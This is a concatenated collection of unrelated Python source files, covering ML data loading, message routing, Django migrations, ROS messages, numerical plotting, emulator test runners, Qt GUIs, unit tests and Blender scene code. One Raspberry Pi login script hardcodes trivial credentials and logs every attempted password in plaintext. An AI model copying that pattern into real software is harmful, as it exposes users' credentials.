semantic_branch=self.sem_branch
)
self.validset = DatasetBuilder.set_test_dataset(
fname=self.db_fname_test.as_posix(),
decoder_aux_branch=self.aux_branch,
normalize_input=self.norm,
rm_touching_nuc_borders=self.rm_touching_nuc_borders,
edge_weights=self.edge_weights,
type_branch=self.type_branch,
semantic_branch=self.sem_branch
)
self.testset = DatasetBuilder.set_test_dataset(
fname=self.db_fname_test.as_posix(),
decoder_aux_branch=self.aux_branch,
normalize_input=self.norm,
rm_touching_nuc_borders=self.rm_touching_nuc_borders,
edge_weights=self.edge_weights,
type_branch=self.type_branch,
semantic_branch=self.sem_branch
)
def train_dataloader(self) -> DataLoader:
return DataLoader(
self.trainset,
batch_size=self.batch_size,
shuffle=True,
pin_memory=True,
num_workers=self.num_workers,
)
def val_dataloader(self) -> DataLoader:
return DataLoader(
self.validset,
batch_size=self.batch_size,
shuffle=False,
pin_memory=True,
num_workers=self.num_workers
)
def test_dataloader(self) -> DataLoader:
return DataLoader(
self.testset,
batch_size=self.batch_size,
shuffle=False,
pin_memory=True,
num_workers=self.num_workers
)
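# Usage sketch (added note, not part of the original module): the paths and the
# `model` name below are hypothetical and only illustrate how this datamodule is
# typically wired into a pytorch_lightning Trainer, assuming the h5/zarr
# databases already exist.
#
#   datamodule = CustomDataModule(
#       train_db_path="/data/train_nuclei.h5",   # hypothetical path
#       test_db_path="/data/test_nuclei.h5",     # hypothetical path
#       augmentations=["hue_sat", "blur"],
#       aux_branch="hover",
#       batch_size=8,
#   )
#   trainer = pl.Trainer(max_epochs=1)
#   trainer.fit(model, datamodule=datamodule)    # `model` is a user-provided pl.LightningModule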
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import collections
import Queue
import threading
import uuid
from . import common_utils
Message = collections.namedtuple("Message", ['id',
'src',
'dest',
'type',
'cont'])
MSG_TYPE = common_utils.enum(REQUEST=0,
RESPONSE=1,
ERROR=-1)
class QueuePair(object):
def __init__(self, recv_queue, send_queue, watch_queue=None):
self.recv = recv_queue
self.send = send_queue
self.watch = watch_queue
def get(self, *args, **kwargs):
return self.recv.get(*args, **kwargs)
def put(self, msg, *args, **kwargs):
if self.watch is not None:
self.watch.put(msg.src)
return self.send.put(msg, *args, **kwargs)
@classmethod
def create_pair(cls, queue_class=Queue.Queue,
watch_queue=None, queue_triple=False):
roli = queue_class()
rilo = queue_class()
router_queue = cls(recv_queue=rilo,
send_queue=roli)
if queue_triple:
leaf_queue = (roli, rilo, watch_queue)
else:
leaf_queue = cls(recv_queue=roli,
send_queue=rilo,
watch_queue=watch_queue)
return (router_queue, leaf_queue)
class Node(object):
def __init__(self):
self.thread = threading.Thread(target=self._main_loop)
self.thread.daemon = True
def _main_loop(self):
raise NotImplementedError()
def run_forever(self, threaded=True):
if threaded:
self.thread.start()
else:
self._main_loop()
class Client(Node):
def __init__(self, ident, router=None,
queue_triple=None, queue_class=Queue.Queue):
super(Client, self).__init__()
self.ident = ident
if queue_triple is not None and router is None:
self.queue = QueuePair(*queue_triple)
elif router is not None and queue_triple is None:
self.queue = router.add(ident, queue_class)
else:
raise TypeError("Either router or queue_triple must not be None.")
def _main_loop(self):
raise NotImplementedError()
def _send(self, msg):
self.queue.put(msg)
def _get(self):
return self.queue.get()
class Worker(Client):
def __init__(self, handler, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.handler = handler
def _main_loop(self):
while True:
msg = self._get()
if msg.type == MSG_TYPE.REQUEST:
ret = self.handler(msg)
self._send(Message(id=msg.id,
src=self.ident,
dest=msg.src,
type=MSG_TYPE.RESPONSE,
cont=ret))
elif msg.type == MSG_TYPE.RESPONSE:
self._send(Message(id=msg.id,
src=self.ident,
dest=msg.src,
type=MSG_TYPE.ERROR,
cont="Sent RESPONSE type "
"message to worker."))
class Master(Client):
class Future(object):
def __init__(self):
self.ready = threading.Event()
self.data = None
def result(self):
self.ready.wait()
return self.data
def fulfill(self, data):
self.data = data
self.ready.set()
def __init__(self, *args, **kwargs):
super(Master, self).__init__(*args, **kwargs)
self.futures = {}
def send(self, dest, msg):
future = Master.Future()
msg_id = uuid.uuid4().hex
self.futures[msg_id] = future
self._send(Message(id=msg_id,
src=self.ident,
dest=dest,
type=MSG_TYPE.REQUEST,
cont=msg))
return future
def _main_loop(self):
while True:
msg = self._get()
if msg.type == MSG_TYPE.RESPONSE:
self.futures[msg.id].fulfill(msg.cont)
del self.futures[msg.id]
elif msg.type == MSG_TYPE.REQUEST:
self._send(Message(id=msg.id,
src=self.ident,
dest=msg.src,
type=MSG_TYPE.ERROR,
cont="Send REQUEST type "
"message to master."))
class Router(Node):
def __init__(self, queue_class=Queue.Queue):
super(Router, self).__init__()
self.clients = {}
self.wait_queue = queue_class()
def _main_loop(self):
while True:
elm = self.wait_queue.get()
msg = self.clients[elm].get()
if msg.dest in self.clients:
self.clients[msg.dest].put(msg)
else:
self.clients[elm].put(Message(id=msg.id,
src=None,
dest=None,
type=MSG_TYPE.ERROR,
cont="That destination "
"does not exist."))
def add(self, ident, queue_class=Queue.Queue, queue_triple=False):
router, leaf = QueuePair.create_pair(queue_class,
self.wait_queue,
queue_triple)
self.clients[ident] = router
return leaf
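if __name__ == "__main__":
    # Minimal usage sketch (added note, illustrative only): wire a Router, one
    # Worker that echoes request content, and a Master, then send a REQUEST and
    # wait on the returned Future. Uses only the classes defined in this module.
    router = Router()
    worker = Worker(handler=lambda msg: msg.cont, ident="worker-1", router=router)
    master = Master(ident="master", router=router)
    router.run_forever()
    worker.run_forever()
    master.run_forever()
    future = master.send("worker-1", "ping")
    print(future.result())  # -> "ping"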
|
# Generated by Django 3.0.2 on 2020-01-28 18:25
import ckeditor.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('pages', '0002_posts'),
]
operations = [
migrations.AlterField(
model_name='posts',
name='body',
field=ckeditor.fields.RichTextField(),
),
]
|
import sys
import time
from datetime import datetime
from picamera import PiCamera
camera = PiCamera()
#camera.start_preview()
code = 1
logins = {'12345': '12345', '123': '123', '1': '1'}
with open("../logs/logs.txt", "a") as f:
match = False
if len(sys.argv) != 3:
f.write("Incorrect format, got arguments: " + str(sys.argv[1:]) + '\n')
else:
login = sys.argv[1]
passwd = sys.argv[2]
for l, p in logins.items():
if l == login and passwd == p:
match = True
break
if match:
f.write('Got match with [' + login + ', ' + passwd + ']\n')
else:
f.write('Did not get match with [' + login + ', ' + passwd + ']\n')
stime = str(datetime.now())
time.sleep(2)
f.write(stime + '\n\n')
camera.capture('../logs/' + stime + '.jpg')
if match:
code = 0
#camera.stop_preview()
sys.exit(code)
|
from alpyro_msgs import RosMessage, duration, float64, string
from alpyro_msgs.geometry_msgs.pointstamped import PointStamped
from alpyro_msgs.geometry_msgs.vector3 import Vector3
class PointHeadGoal(RosMessage):
__msg_typ__ = "control_msgs/PointHeadGoal"
__msg_def__ = "Z2VvbWV0cnlfbXNncy9Qb2ludFN0YW1wZWQgdGFyZ2V0CiAgc3RkX21zZ3MvSGVhZGVyIGhlYWRlcgogICAgdWludDMyIHNlcQogICAgdGltZSBzdGFtcAogICAgc3RyaW5nIGZyYW1lX2lkCiAgZ2VvbWV0cnlfbXNncy9Qb2ludCBwb2ludAogICAgZmxvYXQ2NCB4CiAgICBmbG9hdDY0IHkKICAgIGZsb2F0NjQgegpnZW9tZXRyeV9tc2dzL1ZlY3RvcjMgcG9pbnRpbmdfYXhpcwogIGZsb2F0NjQgeAogIGZsb2F0NjQgeQogIGZsb2F0NjQgegpzdHJpbmcgcG9pbnRpbmdfZnJhbWUKZHVyYXRpb24gbWluX2R1cmF0aW9uCmZsb2F0NjQgbWF4X3ZlbG9jaXR5Cgo="
__md5_sum__ = "8b92b1cd5e06c8a94c917dc3209a4c1d"
target: PointStamped
pointing_axis: Vector3
pointing_frame: string
min_duration: duration
max_velocity: float64
|
#!/usr/bin/env python
import sys
import os
import glob
import argparse
import numpy
import matplotlib.pyplot as plt
def load_data(path):
# Estimate number of processors
num_procs = len(glob.glob(os.path.join(path, "jacobi_*.txt")))
# Load all data
data = []
num_points = 0
for i in range(num_procs):
data.append(numpy.loadtxt(os.path.join(path, "jacobi_%s.txt" % i)))
num_points += data[-1].shape[0]
# Create data arrays
x = numpy.empty(num_points)
U = numpy.empty(num_points)
index = 0
for i in range(num_procs):
x[index:index + data[i].shape[0]] = data[i][:, 0]
U[index:index + data[i].shape[0]] = data[i][:, 1]
index += data[i].shape[0]
return x, U
def plot_solution(x, U):
x_true, u_true = true_solution()
fig = plt.figure()
axes = fig.add_subplot(1, 1, 1)
axes.plot(x, U, 'ro')
axes.plot(x_true, u_true, 'k')
axes.set_xlim([0.0, 1.0])
axes.set_xlabel(r"$x$")
axes.set_ylim([0.0, 3.0])
axes.set_ylabel(r"$u(x)$")
axes.set_title(r"Solution to $u_{xx} = f(x)$")
return fig
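# Sanity check on the analytic solution used below (added note): with
# U(x) = (4 - e) x - 1 + e^x one gets U''(x) = e^x, U(0) = 0 and U(1) = 3,
# i.e. it solves the boundary value problem u_xx = e^x with u(0) = 0, u(1) = 3,
# which matches the axis limits and the title used in plot_solution above.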
def true_solution():
x = numpy.linspace(0.0, 1.0, 1000)
U = (4.0 - numpy.exp(1.0)) * x - 1.0 + numpy.exp(x)
return x, U
if __name__ == '__main__':
path = os.getcwd()
if len(sys.argv) > 1:
path = sys.argv[1]
x, U = load_data(path)
fig = plot_solution(x, U)
fig.savefig("jacobi.png")
plt.show() |
#!/usr/bin/env python
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# script to run an abc test on a windows mobile emulator
# - requires the wmrunner.exe program to be running in the emulator
import os,sys,shutil,time,datetime,random,re
def runTest():
global starttime
dir=None
# search for an unlocked emulator directory
while dir==None:
dirs=os.listdir(dirbase)
random.shuffle(dirs)
# print("SHELL: looking for free emulator : %d" % (time.time()-starttime))
for eachdir in dirs:
try:
sdate=str(datetime.datetime.today())+"\n"
if os.path.isdir(dirbase+'/'+eachdir) and os.path.exists(dirbase+'/'+eachdir+'/lock')==False:
file=open(dirbase+'/'+eachdir+'/lock','w')
file.write(sdate)
file.close()
dir=dirbase+'/'+eachdir
time.sleep(.1)
file=open(dir+'/lock','r')
sdateread=file.read()
file.close()
if sdateread!=sdate:
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,'ERROR: writing lock file')
time.sleep(.1)
if os.path.exists(dir+'/lock')==False:
print("ERROR: lock file does not exist")
return (-1,'ERROR: lock file does not exist')
break
except:
print("ERROR: exception lock file")
try:
os.unlink(dir+"/lock")
except:
pass
return (-1,"ERROR: exception writing lock file")
time.sleep(.1)
# print("SHELL: running emulator %s : %d" % (dir,time.time()-starttime))
ddir="\\Storage Card\\media"
cmdfile=dir+"/nextvm.txt"
dlog='%s/media/%s.log' % (dir,base)
dabc='%s/media/%s.abc' % (dir,base)
exitcodefile='%s.exitcode' % dabc
ctr=0
# clean up old log and abc files
try:
ctr=0
while os.path.exists(cmdfile) and ctr<20:
time.sleep(.1)
ctr+=1
if os.path.exists(dlog):
os.unlink(dlog)
if os.path.exists(dabc):
os.unlink(dabc)
if os.path.exists(exitcodefile):
os.unlink(exitcodefile)
except:
print("ERROR: exception deleting file")
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,"ERROR: exception deleting file")
args=""
newdlog=None
for arg in sys.argv[1:-1]:
if re.search('.abc',arg)!=None:
shutil.copy(cwd+'/'+arg,dir+'/media')
if arg.find('/')>-1:
arg=arg[arg.rfind('/')+1:]
args+=' \"%s\%s\" ' % (ddir,arg)
if newdlog==None:
dlog='%s/media/%s.log' % (dir,arg[0:arg.find('.')])
newdlog=dlog
try:
if os.path.exists(dlog):
os.unlink(dlog)
except:
return (-1,"ERROR: deleting log file %s" % dlog)
else:
args+=' '+arg
# copy .abc test to the emulator directory
try:
shutil.copy(cwd+"/"+abc,dabc)
except:
print("ERROR: copying abc file")
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,"ERROR: copying abc file")
try:
file=open(cmdfile,"w")
file.write("-log %s \"%s\%s.abc\" " % (args,ddir,base))
file.close()
except:
print("ERROR: write command file failed")
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,"ERROR: write command file failed")
# wait until emulator deletes nextvm.txt command file
# print("SHELL: wrote file %s : %d" % (cmdfile,time.time()-starttime))
while os.path.exists(cmdfile):
time.sleep(.1)
# print("SHELL: detected test finished %d" % (time.time()-starttime))
if os.path.exists(dlog)==False:
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,"ERROR: cannot find log %s" % dlog)
ctr=0
while os.path.exists(dlog)==False and ctr<50:
time.sleep(.1)
ctr+=1
# read the exitcode file
exitcode=0
ctr=0
while os.path.exists(exitcodefile)==False and ctr<50:
time.sleep(.4)
ctr+=1
if os.path.exists(exitcodefile):
try:
file=open(exitcodefile,'r')
exitcodestr=file.read()
exitcode=int(exitcodestr.strip())
file.close()
except:
print('exception reading exit code file')
try:
os.unlink(dir+'/lock')
except:
pass
return (-1,"exception reading exit code file")
else:
print("ERROR: cannot find exit code file %s" % exitcodefile)
if os.path.exists(dir+'/lock'):
os.unlink(dir+'/lock')
return (-1,"ERROR: cannot find exit code file %s" % exitcodefile)
# remove lock, another thread can use the emulator while the shell reads the output log
# print("SHELL: finished %s : %d" % (abc,time.time()-starttime))
try:
os.unlink(dir+'/lock')
except:
print("exception deleting %s/lock" % dir)
return (-1,"exception deleting %s/lock" %dir)
# read and print the log file
try:
file=open(dlog,'r')
sysout=file.read()
print(sysout)
except:
print("ERROR: failed to read log %s" % dlog)
return (-1,"ERROR: failed to read log %s" % dlog)
return (exitcode,"succeeded")
# main
if len(sys.argv)==1:
print("ERROR: not enough arguments, usage: %s arguments... test_file.abc" % sys.argv[0])
sys.exit(1)
starttime=time.time()
cwd=os.getcwd()
# abc to test
abc=sys.argv[-1]
# flatten the directory path
abc=abc.replace('/','\\')
base=abc[0:abc.rfind('.')].replace('\\','_')
# find an available emulator; each emulator is represented by a directory under dirbase
dirbase=cwd+"/../util/emulator_files"
if 'EMULATORDIR' in os.environ:
dirbase=os.environ['EMULATORDIR'].strip()
if os.path.isdir(dirbase)==False:
print("ERROR: emulator directory '%s' not found" % dirbase)
sys.exit(1)
# if .log file is not written try multiple attempts
attempts=0
retrys=0
while retrys<5:
#print("attempt %d, retry %d" % (attempts,retrys))
(res,sysout)=runTest()
#print("exit code=%d reason=%s" % (res,sysout))
if res!=-1 and res!=1:
sys.exit(res)
attempts+=1
if res==1:
retrys+=1
time.sleep(1)
try:
file=open(dirbase+'/../failures.log','a')
file.write("%s attempt %d %s %s\n" %(str(datetime.datetime.today()),attempts,sys.argv[1:],sysout))
file.close()
except:
print("ERROR: writing failures.log")
time.sleep(1)
sys.exit(res)
|
import numpy as np
from ..util.errors import NumericalPrecisionError
from ..util.opt import partial_nn_opt
from .coreset import Coreset
class BatchPSVICoreset(Coreset):
def __init__(self, data, ll_projector, opt_itrs, n_subsample_opt=None, step_sched=lambda m: lambda i : 1./(1.+i), mup=None, Zmean=None, SigpInv=None, diagnostics=False, **kw):
self.data = data
self.ll_projector = ll_projector
self.opt_itrs = opt_itrs
self.n_subsample_opt = None if n_subsample_opt is None else min(data.shape[0], n_subsample_opt)
self.step_sched = step_sched
self.mup = mup
self.SigpInv = SigpInv
super().__init__(**kw)
def _build(self, itrs, sz):
# initialize the points via full dataset subsampling
init_idcs = np.random.choice(self.data.shape[0], size=sz, replace=False)
self.pts = self.data[init_idcs]
self.wts = self.data.shape[0]/sz*np.ones(sz)
self.idcs = init_idcs
# run gradient optimization for opt_itrs steps
self._optimize()
def _get_projection(self, n_subsample, w, p):
#update the projector
self.ll_projector.update(w, p)
#construct a tangent space
if n_subsample is None:
sub_idcs = None
vecs = self.ll_projector.project(self.data)
sum_scaling = 1.
else:
sub_idcs = np.random.randint(self.data.shape[0], size=n_subsample)
vecs = self.ll_projector.project(self.data[sub_idcs])
sum_scaling = self.data.shape[0]/n_subsample
if p.size > 0:
corevecs, pgrads = self.ll_projector.project(p, grad=True)
else:
corevecs, pgrads = np.zeros((0, vecs.shape[1])), np.zeros((0, vecs.shape[1], p.shape[1]))
return vecs, sum_scaling, sub_idcs, corevecs, pgrads
def _optimize(self):
sz = self.wts.shape[0]
d = self.pts.shape[1]
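# Interpretation of the gradient below (added note, a sketch): grd() computes the
# gradient of the squared tangent-space residual
#   J(w, u) = 1/(2m) * || s * sum_n v_n - sum_j w_j c_j(u_j) ||^2,
# where m = corevecs.shape[1], s = sum_scaling, v_n are projections of the
# (sub)sampled data and c_j(u_j) projections of the coreset points; wgrad and
# ugrad are dJ/dw and dJ/du respectively.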
def grd(x):
w = x[:sz]
p = x[sz:].reshape((sz, d))
vecs, sum_scaling, sub_idcs, corevecs, pgrads = self._get_projection(self.n_subsample_opt, w, p)
#compute gradient of weights and pts
resid = sum_scaling*vecs.sum(axis=0) - w.dot(corevecs)
wgrad = -corevecs.dot(resid) / corevecs.shape[1]
ugrad = -(w[:, np.newaxis, np.newaxis]*pgrads*resid[np.newaxis, :, np.newaxis]).sum(axis=1)/corevecs.shape[1]
#return reshaped grad
grad = np.hstack((wgrad, ugrad.reshape(sz*d)))
return grad
x0 = np.hstack((self.wts, self.pts.reshape(sz*d)))
xf = partial_nn_opt(x0, grd, np.arange(sz), self.opt_itrs, step_sched = self.step_sched(sz))
self.wts = xf[:sz]
self.pts = xf[sz:].reshape((sz, d))
def error(self):
return 0. #TODO: implement KL estimate
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
from src import Menu
from src import Content
from src import Transfer
from src import Constants
from PyQt5.QtGui import QIcon
from PyQt5 import QtWidgets, uic
from PyQt5.QtWidgets import QFileDialog
import ctypes
try:
temp1 = ctypes.windll.LoadLibrary('../DLL/api-ms-win-crt-runtime-l1-1-0.dll')
except:
pass
qtCreatorFile = "launcher.ui"
Ui_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)
class PyQtApp(QtWidgets.QMainWindow, Ui_MainWindow):
def __init__(self):
QtWidgets.QMainWindow.__init__(self)
Ui_MainWindow.__init__(self)
self.setupUi(self)
# Set the window icon
self.setWindowIcon(QIcon(Constants.ICON_ANDROID))
self.menu_bar = Menu.Menu(self)
self.menu_bar.addMenu()
self.select_button.clicked.connect(self.selectFile)
self.convert_button.clicked.connect(self.converter)
self.content = Content.Content()
def converter(self):
self.output_log(self.content.seprate())
if self.density_edit.toPlainText() and self.scale_density_edit.toPlainText() and self.xdpi_edit.toPlainText() and self.file_path_edit.toPlainText():
Transfer.Transfer(float(self.density_edit.toPlainText()), float(self.scale_density_edit.toPlainText()),
float(self.xdpi_edit.toPlainText()), str(self.file_path_edit.toPlainText())).generator(
self.output_log)
else:
self.output_log(self.content.param_error())
def selectFile(self):
""" select xml file """
file_name, file_type = QFileDialog.getOpenFileName(self, Constants.dialog_title, Constants.dialog_init_path,
Constants.dialog_file_type)
self.output_log(self.content.output_file_path() % file_name)
self.file_path_edit.append(file_name)
def output_log(self, log_info):
""" output info to consle """
if log_info:
self.output_edit.append('\n' + log_info)
# print('\n' + log_info)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
window = PyQtApp()
window.show()
sys.exit(app.exec_())
|
import numpy as np
import pytest
from continuum.scenarios import Rotations
from tests.test_classorder import InMemoryDatasetTest
from continuum.datasets import MNIST, CIFAR100
@pytest.fixture
def numpy_data():
nb_classes = 6
nb_data = 100
x_train = []
y_train = []
for i in range(nb_classes):
x_train.append(np.ones((nb_data, 4, 4, 3), dtype=np.uint8) * i)
y_train.append(np.ones(nb_data) * i)
x_train = np.concatenate(x_train)
y_train = np.concatenate(y_train)
x_test = np.copy(x_train)
y_test = np.copy(y_train)
return (x_train, y_train.astype(int)), (x_test, y_test.astype(int))
'''
Test the initialization with three tasks
'''
def test_init(numpy_data):
train, test = numpy_data
dummy = InMemoryDatasetTest(*train)
Trsf_0 = 0
Trsf_1 = (15, 20)
Trsf_2 = 45
list_degrees = [Trsf_0, Trsf_1, Trsf_2]
scenario = Rotations(cl_dataset=dummy, nb_tasks=3, list_degrees=list_degrees)
for task_id, train_dataset in enumerate(scenario):
continue
@pytest.mark.parametrize("shared_label_space", [True, False])
def test_shared_labels(numpy_data, shared_label_space):
train, test = numpy_data
dummy = InMemoryDatasetTest(*train)
list_degrees = [0, 15, 45]
scenario = Rotations(cl_dataset=dummy, nb_tasks=3, list_degrees=list_degrees, shared_label_space=shared_label_space)
previous_classes = None
for task_id, taskset in enumerate(scenario):
classes = taskset.get_classes()
if task_id > 0:
if shared_label_space:
assert (classes == previous_classes).all()
else:
assert (classes == previous_classes + len(classes)).all()
previous_classes = classes
def test_fail_init(numpy_data):
train, test = numpy_data
dummy = InMemoryDatasetTest(*train)
Trsf_0 = 2
Trsf_1 = (15, 20, 25)  # does not make sense: not a valid degree specification
Trsf_2 = 45
list_degrees = [Trsf_0, Trsf_1, Trsf_2]
# should detect that a transformation in the list does not make sense
with pytest.raises(ValueError):
Rotations(cl_dataset=dummy, nb_tasks=3, list_degrees=list_degrees)
@pytest.mark.slow
@pytest.mark.parametrize("shared_label_space", [True, False])
@pytest.mark.parametrize("dataset", [MNIST, CIFAR100])
def test_with_dataset(dataset, shared_label_space):
dataset = dataset(data_path="./tests/Datasets", download=True, train=True)
list_degrees = [0, 45, 90]
scenario = Rotations(cl_dataset=dataset,
nb_tasks=3,
list_degrees=list_degrees,
shared_label_space=shared_label_space)
for task_id, taskset in enumerate(scenario):
classes = taskset.get_classes()
if shared_label_space:
assert len(classes) == classes.max() + 1
else:
assert len(classes) == classes.max() + 1 - (task_id * len(classes))
|
#!/usr/bin/env python
#coding:utf-8
# Created: 21.02.2010
# Copyright (C) 2010, Manfred Moitzi
# License: MIT License
__author__ = "mozman <[email protected]>"
import unittest
from dxfwrite.base import dxfstr
from dxfwrite.entities import Insert, Attrib
class TestInsert(unittest.TestCase):
def test_insert_simple(self):
insert = Insert(blockname='empty')
expected = " 0\nINSERT\n 8\n0\n 2\nempty\n 10\n0.0\n 20\n0.0\n 30\n0.0\n"
self.assertEqual(dxfstr(insert), expected)
def test_insert_all_attribs(self):
insert = Insert(
attribs_follow = 1,
blockname='empty',
xscale=1.0,
yscale=2.0,
zscale=3.0,
rotation=30.0,
columns=2,
rows=7,
colspacing=1.7,
rowspacing=2.9
)
expected = " 0\nINSERT\n 8\n0\n 66\n1\n 2\nempty\n" \
" 10\n0.0\n 20\n0.0\n 30\n0.0\n" \
" 41\n1.0\n 42\n2.0\n 43\n3.0\n 50\n30.0\n" \
" 70\n2\n 71\n7\n 44\n1.7\n 45\n2.9\n"
self.assertEqual(dxfstr(insert), expected)
def test_add_attrib_absolute(self):
block_ref = Insert(blockname='TestAttrib',
insert=(5, 5),
rotation=30)
attrib = Attrib(
insert=(1, 1),
rotation=15,
tag='TEST',
text='attrib',
)
block_ref.add(attrib, relative=False)
inserted_attrib = block_ref.data[0]
self.assertEqual(inserted_attrib['rotation'], 15.)
self.assertEqual(inserted_attrib['insert']['xy'], [1., 1.])
def test_add_attrib_relative(self):
# insert blockref with 45 degree rotation
block_ref = Insert(blockname='TestAttrib',
insert=(0, 0),
rotation=45)
attrib = Attrib(
insert=(1, 1),
rotation=45, # 45 degree relative to original block definition
tag='TEST',
text='attrib',
)
block_ref.add(attrib, relative=True) # result rotation = 45 + 45 = 90
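# Added note: rotating the relative insert point (1, 1) by the block's 45 deg
# gives (cos45 - sin45, sin45 + cos45) = (0, sqrt(2)), which is what the two
# assertAlmostEqual checks below verify.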
inserted_attrib = block_ref.data[0]
self.assertEqual(inserted_attrib['rotation'], 90.)
self.assertAlmostEqual(inserted_attrib['insert']['x'], 0, places=3)
self.assertAlmostEqual(inserted_attrib['insert']['y'], 1.4142, places=3) # y = sqrt(2)
if __name__=='__main__':
unittest.main()
|
#### PATTERN | FR ##################################################################################
# Copyright (c) 2012 University of Antwerp, Belgium
# Author: Tom De Smedt <[email protected]>
# License: BSD (see LICENSE.txt for details).
# http://www.clips.ua.ac.be/pages/pattern
####################################################################################################
# French linguistic tools using fast regular expressions.
from inflect import \
predicative, attributive
from parser.sentiment import sentiment, polarity, subjectivity, positive
from parser.sentiment import NOUN, VERB, ADJECTIVE, ADVERB |
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests to assure the Routing slip Class.
Test-Suite to ensure that the Routing Slip Class is working as expected.
"""
from faker import Faker
from pay_api.models import RoutingSlip
from tests.utilities.base_test import factory_payment_account, factory_routing_slip
fake = Faker()
def test_routing_slip_find_creation(session):
"""Assert a routing slip is stored.
Start with a blank database.
"""
payment_account = factory_payment_account()
payment_account.save()
rs = factory_routing_slip(payment_account_id=payment_account.id)
rs.save()
assert rs.id is not None
routing_slip = RoutingSlip()
assert routing_slip.find_by_number(rs.number) is not None
def test_routing_slip_find_search(session):
"""Assert a routing slip is stored.
Start with a blank database.
"""
payment_account = factory_payment_account()
payment_account.save()
rs = factory_routing_slip(number=fake.name(), payment_account_id=payment_account.id)
rs.save()
for i in range(20):
factory_routing_slip(number=fake.name(), payment_account_id=payment_account.id).save()
routing_slip = RoutingSlip()
search_dict = {'routingSlipNumber': rs.number}
res, count = routing_slip.search(search_dict, page=1, limit=1, max_no_records=50, return_all=True)
assert count == 50
assert len(res) == 1, 'searched with routing slip number, so only one record'
res, count = routing_slip.search({}, page=1, limit=1, max_no_records=50, return_all=True)
assert count == 50
assert len(res) == 21, 'return_all is True, so should return all records'
res, count = routing_slip.search({}, page=1, limit=1, max_no_records=50, return_all=False)
assert count == 21
assert len(res) == 1, 'return all false'
|
import os
import sys
import bpy
import json
import argparse
import mathutils
import numpy as np
materials_path = os.path.dirname(os.path.realpath(__file__)) + '/materials.blend'
#################################################
# https://stackoverflow.com/questions/28075599/opening-blend-files-using-blenders-python-api
from bpy.app.handlers import persistent
@persistent
def load_handler(dummy):
print("Load Handler:", bpy.data.filepath)
bpy.app.handlers.load_post.append(load_handler)
#################################################
class BlockScene:
'''
scene_json : Either a .json string of block parameters or an already-parsed
list of block dicts of the same structure, describing the blocks to place
trace : Optional physics trace with per-frame 'position' and 'rotation'
entries; its length determines the number of animation frames
wire_frame : If True, blocks are rendered with a wireframe modifier
'''
def __init__(self, scene_json, trace = None, wire_frame = False):
# Initialize attributes
self.wire_frame = wire_frame
self.trace = trace
# Clear scene
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_by_type(type='MESH')
bpy.ops.object.delete(use_global=False)
for item in bpy.data.meshes:
bpy.data.meshes.remove(item)
# Load materials and textures
with Suppressor():
bpy.ops.wm.open_mainfile(filepath=materials_path)
if not trace is None:
frames = len(trace['position'])
else:
frames = 1
bpy.context.scene.frame_set(1)
bpy.context.scene.frame_end = frames + 1
# bpy.context.scene.frame_step = bp
# Parse tower structure
self.load_scene(scene_json)
def select_obj(self, obj):
"""
Brings the given object into active context.
"""
bpy.ops.object.select_all(action='DESELECT')
obj.select = True
bpy.context.scene.objects.active = obj
bpy.context.scene.update()
def rotate_obj(self, obj, rot):
"""
Rotates the given object by the given quaternion.
"""
self.select_obj(obj)
obj.rotation_mode = 'QUATERNION'
obj.rotation_quaternion = np.roll(rot, 1) # [3, 0, 1, 2]
bpy.context.scene.update()
def move_obj(self, obj, pos):
"""
Moves the given object by the given 3-d vector.
"""
self.select_obj(obj)
pos = mathutils.Vector(pos)
obj.location = pos
bpy.context.scene.update()
def scale_obj(self, obj, dims):
"""
Rescales to the object to the given dimensions.
"""
self.select_obj(obj)
obj.dimensions = dims
bpy.context.scene.update()
bpy.ops.object.origin_set(type='ORIGIN_GEOMETRY')
bpy.context.scene.update()
def set_appearance(self, obj, mat):
"""
Assigns a material to a block.
"""
if not mat in bpy.data.materials:
raise ValueError('Unknown material {}'.format(mat))
obj.active_material = bpy.data.materials[mat]
bpy.context.scene.update()
def create_block(self, object_d):
"""
Initializes a block object.
"""
bpy.ops.mesh.primitive_cube_add(location=object_d['data']['pos'],
view_align=False,
enter_editmode=False)
ob = bpy.context.object
ob.name = '{0:d}'.format(object_d['id'])
ob.show_name = True
me = ob.data
me.name = '{0:d}_Mesh'.format(object_d['id'])
self.scale_obj(ob, object_d['data']['dims'])
ob.matrix_world.translation
if 'appearance' in object_d['data'] and \
'substance' in object_d['data']:
mat = object_d['data']['appearance']
mass = object_d['data']['substance']['density'] * \
np.prod(object_d['data']['dims'])
friction = object_d['data']['substance']['friction']
else:
mat = 'Wood'
phys_key = 'Wood'
mass = substances.density[phys_key] * \
np.prod(object_d['data']['dims'])
friction = substances.friction[phys_key]
self.set_appearance(ob, mat)
if self.wire_frame:
if ob.name == '5':
self.set_appearance(ob, 'L')
bpy.ops.object.mode_set(mode='EDIT')
# bpy.ops.mesh.subdivide()
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.modifier_add(type='WIREFRAME')
ob.modifiers['Wireframe'].thickness = 0.2
def set_base(self, block):
"""
Creates the table on which the blocks will stand.
"""
bpy.ops.mesh.primitive_cylinder_add(
location = block['pos'],
view_align=False,
enter_editmode=False)
ob = bpy.context.object
ob.name = 'base'
ob.show_name = False
ob.data.name = '{}_Mesh'.format('base')
self.scale_obj(ob, (40, 40, 1))
self.set_appearance(ob, 'Marble')
if self.wire_frame:
ob.cycles_visibility.diffuse = False
ob.hide = True
